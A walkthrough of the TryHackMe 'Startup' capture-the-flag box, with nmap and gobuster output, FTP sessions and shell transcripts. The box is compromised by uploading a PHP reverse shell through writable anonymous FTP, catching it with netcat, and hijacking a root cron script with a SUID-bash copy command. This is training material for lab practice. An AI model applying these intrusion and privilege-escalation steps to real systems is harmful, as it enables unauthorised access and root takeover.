Startup TryHackMe Writeup

Startup is a boot2root challenge available on TryHackMe. This is an easy level box which includes compromising a web server by uploading our web shell via FTP and then exploiting a cronjob to get the root shell. Let's get started!

Startup TryHackMe Writeup

Challenge Link: https://tryhackme.com/room/startup

Initial Enumeration

I started the initial enumeration by running a port scan using nmap looking for open ports and default scripts.

┌──(madhav㉿kali)-[~/ctf/thm/startup]
└─$ nmap -sC -sV -oN nmap/initial 10.10.254.238      
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-01 20:34 IST
Nmap scan report for 10.10.254.238
Host is up (0.16s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxrwx    2 65534    65534        4096 Nov 12  2020 ftp [NSE: writeable]
| -rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
|_-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.17.12.59
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b9:a6:0b:84:1d:22:01:a4:01:30:48:43:61:2b:ab:94 (RSA)
|   256 ec:13:25:8c:18:20:36:e6:ce:91:0e:16:26:eb:a2:be (ECDSA)
|_  256 a2:ff:2a:72:81:aa:a2:9f:55:a4:dc:92:23:e6:b4:3f (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Maintenance
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.68 seconds

We have three ports open, FTP running on port 21, SSH running on port 22 and Apache web server running on port 80. We can also see that FTP has anonymous login enabled so let's enumerate it first.

┌──(madhav㉿kali)-[~/ctf/thm/startup]
└─$ ftp 10.10.254.238
Connected to 10.10.254.238.
220 (vsFTPd 3.0.3)
Name (10.10.254.238:madhav): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 65534    65534        4096 Nov 12  2020 ftp
-rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt
226 Directory send OK.

I downloaded all the files from the FTP server and started enumerating them one by one.

ftp> get important.jpg
local: important.jpg remote: important.jpg
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for important.jpg (251631 bytes).
226 Transfer complete.
251631 bytes received in 2.23 secs (109.9752 kB/s)
ftp> get notice.txt
local: notice.txt remote: notice.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for notice.txt (208 bytes).
226 Transfer complete.
208 bytes received in 0.00 secs (114.5011 kB/s)
ftp> cd ftp
250 Directory successfully changed.
ftp> ls -lah
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 65534    65534        4096 Nov 12  2020 .
drwxr-xr-x    3 65534    65534        4096 Nov 12  2020 ..
226 Directory send OK.
ftp> exit
221 Goodbye.

There is an image named important.jpg, a text file named notice.txt and there was also a ftp directory which was empty.

┌──(madhav㉿kali)-[~/ctf/thm/startup]
└─$ cat notice.txt 
Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus.
important.jpg

I tried extracting data from the image using exiftool and binwalk but it did not contain any useful information.  So now let's start enumerating the web server running on port 80.

There was nothing interesting on the homepage, so I ran a gobuster scan to look for hidden files and directories.

┌──(madhav㉿kali)-[~/ctf/thm/startup]
└─$ gobuster dir -u http://10.10.254.238 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt       
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.254.238
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/11/01 20:37:04 Starting gobuster in directory enumeration mode
===============================================================
/files                (Status: 301) [Size: 314] [--> http://10.10.254.238/files/]
/server-status        (Status: 403) [Size: 278]                                  
                                                                                 
===============================================================
2021/11/01 21:35:26 Finished
===============================================================

There is a directory named files which contains the same content as the FTP.

I went back to the FTP and checked if we had permission to upload our own files. I tested it by uploading a sample file.

┌──(madhav㉿kali)-[~/ctf/thm/startup]
└─$ ftp 10.10.254.238
Connected to 10.10.254.238.
220 (vsFTPd 3.0.3)
Name (10.10.254.238:madhav): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 65534    65534        4096 Nov 12  2020 ftp
-rw-r--r--    1 0        0          251631 Nov 12  2020 important.jpg
-rw-r--r--    1 0        0             208 Nov 12  2020 notice.txt
226 Directory send OK.
ftp> cd ftp
250 Directory successfully changed.
ftp> put sample.txt
local: sample.txt remote: sample.txt
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5 bytes sent in 0.00 secs (46.0643 kB/s)
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxr-x    1 112      118             5 Nov 01 15:31 sample.txt
226 Directory send OK.
ftp> exit
221 Goodbye.

The file was uploaded successfully and it was also reflected on the web server. Now if we visit http://10.10.254.238/files/ftp/, there will be a file named sample.txt.

Using the same method, I uploaded a php reverse shell and executed it from the web server.

After running the php reverse shell, we will get a reverse shell back into our system.

┌──(madhav㉿kali)-[~/ctf/thm/startup]
└─$ nc -lvnp 9001                                    
listening on [any] 9001 ...
connect to [10.17.12.59] from (UNKNOWN) [10.10.254.238] 49696
Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 16:31:01 up  1:27,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

User Shell

I upgraded the reverse shell into a fully interactive TTY using the following commands. This will allow us to use tab completion and the clear command.

python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo && fg
reset
export TERM=xterm
stty rows 48 columns 179

Next, I checked the home directory and there was a user named lennie but we do not have access to its home directory.

www-data@startup:/$ ls -lah /home
total 12K
drwxr-xr-x  3 root   root   4.0K Nov 12  2020 .
drwxr-xr-x 25 root   root   4.0K Nov  1 15:04 ..
drwx------  4 lennie lennie 4.0K Nov 12  2020 lennie

Next I checked the root directory and in there, we have a folder named /incidents and a file named recipe.txt.

www-data@startup:/$ ls
bin   dev  home       initrd.img      lib    lost+found  mnt  proc        root  sbin  srv  tmp  vagrant  vmlinuz
boot  etc  incidents  initrd.img.old  lib64  media       opt  recipe.txt  run   snap  sys  usr  var      vmlinuz.old

Inside the incidents directory, we have a file named suspicious.pcapng. I downloaded this file on my computer and opened it with wireshark.

After opening, I went to the TCP packets and then right click on the packet > Follow > TCP Stream.

Inside this there were shell commands that the user tried to run on the system and when you scroll down, you'll find the password for user lennie.

Now we can login as user lennie via SSH and read our user flag.

┌──(madhav㉿kali)-[~/ctf/thm/startup]
└─$ ssh lennie@10.10.254.238      
The authenticity of host '10.10.254.238 (10.10.254.238)' can't be established.
ECDSA key fingerprint is SHA256:xXyVGVy1l27TVcjIQj2kgTTmLYN6WCB93YJB3mAHLkA.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.254.238' (ECDSA) to the list of known hosts.
lennie@10.10.254.238's password: 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-190-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

44 packages can be updated.
30 updates are security updates.



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

$ bash
lennie@startup:~$ ls
Documents  scripts  user.txt
lennie@startup:~$ wc -c user.txt 
38 user.txt
lennie@startup:~$

Root Shell

Now that we have a shell as user lennie, our next step would be to get a root shell on the box. I ran sudo -l command to see if user lennie can run any command as root and also checked if there were any interesting SUID files but there was no luck.

Next I uploaded pspy and found that /home/lennie/scripts/planner.sh is being executed as user root after every minute by a cronjob.

Now I checked the scripts/planner.sh present in the home directory of user lennie.

lennie@startup:~/scripts$ cat planner.sh 
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh

We do not have writable permission for the file but we can see the file is executing another script named /etc/print.sh. I checked the permission for this file and yes, we have the permissions to modify the file.

lennie@startup:~/scripts$ ls -lah /etc/print.sh 
-rwx------ 1 lennie lennie 25 Nov 12  2020 /etc/print.sh

So I ran the following command to modify /etc/print.sh.

lennie@startup:~/scripts$ echo "cp /bin/bash /tmp && chmod +s /tmp/bash" > /etc/print.sh

When the script will be executed, it will copy the /bin/bash to /tmp directory and make it a SUID.

lennie@startup:~/scripts$ ls -l /tmp
total 1016
-rwsr-sr-x 1 root root 1037528 Nov  1 17:40 bash

We can see that this file has special permissions! Now we can get a root shell by running the /tmp/bash -p command. Once we are root, we can read our root flag present in the /root directory!

lennie@startup:~/scripts$ /tmp/bash -p
bash-4.3# id
uid=1002(lennie) gid=1002(lennie) euid=0(root) egid=0(root) groups=0(root),1002(lennie)
bash-4.3# cd /root
bash-4.3# wc -c root.txt
38 root.txt

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Fábio Lobo.